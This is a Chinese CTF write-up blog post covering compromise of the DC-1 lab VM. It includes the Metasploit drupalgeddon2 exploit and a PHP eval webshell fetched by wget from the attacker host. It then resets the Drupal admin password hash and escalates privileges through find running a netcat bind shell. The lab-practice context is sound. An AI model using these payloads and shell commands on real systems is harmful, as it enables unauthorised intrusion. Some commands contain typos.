zoukankan      html  css  js  c++  java
  • DC:1渗透测试

    DC1 渗透测试

    实验环境:

    靶机:DC:1 点击下载

    攻击机:kali,win10

    实验步骤:

    1. 安装靶机
    2. 信息收集
    3. 漏洞利用
    4. 提权

    实验开始:

    下载靶机
    安装靶机
    使用靶机OVA文件在vmvara安装
    修改靶机网络
        进入单用户模式
    重启靶机
    
    信息收集
    ip收集
    arp-scan -l;
    nmap -sV 192.168.10.18
    
    指纹查询
    使用浏览器插件wappalyzer查cms
    

    相关漏洞搜寻

    msfconsole
    search drupal
    

    漏洞利用

    msf攻击
    use exploit/unix/webapp/drupal_drupalgeddon2
    set RHOST=192.168.10.18
    explit
    shell
    python -c "import pty;pty.spwan('/bin/sh')"
    
    上传PHP木马
    先在kali上启动apache2
    vim /var/www/test.txt
        <?php
            eval($_POST['key']);
        ?>
    在会到msf中
    wget http://192.168.10.17/test.txt
    cp test.txt test.php
    
    蚁剑链接

    查看配置文件
    目录中有一个flag1.txt
    在配置文件中有一个flag2
    根据提示访问数据库
    
    查看数据库
    
    利用蚁剑可以直接连接
    可以直接看到user表
    得知password被加密,如果需要改密码就要进行同样的加密
    
    修改password-hash.sh
    
    在蚁剑中执行的时候产生了报错
    报错的行在83,84行
    我把文件的路径改后就能正常执行了
    
    执行password-hash.sh
    ./password-hash.sh root
    
    修改数据数据

    在执行过脚本之后就产生了一串hash值可以直接添加进表中

    update users set password = '$S$DOjcjhOiiHtadIneTwIvHAHacQ2dXVvF9xG8Mi8.h8dLGndJMZJY' where uid='1';
    

    登录主页查看flag3

    主机信息收集
    进入home得到flag4
    cd /home/flag4
    cat fla*
    

    提权,拿最终flag!
    使用find+netcat 提权
    蚁剑:
        find / -exec netcat -lvp 5555 -e '/bin/sh';
    kali:
        nc 192.168.10.18 5555
        cd /root/
        ls
        cat thi*
    

    ——实验结束——!

  • 相关阅读:
    第六周
    第五周(实验报告)
    第四周(实验报告)
    第三周(实验报告)
    Java第二周学习总结
    第一周
    2019课程总结
    第十四周课程总结
    第十三周总结
    第十二周总结
  • 原文地址:https://www.cnblogs.com/txxj/p/14059067.html
Copyright © 2011-2022 走看看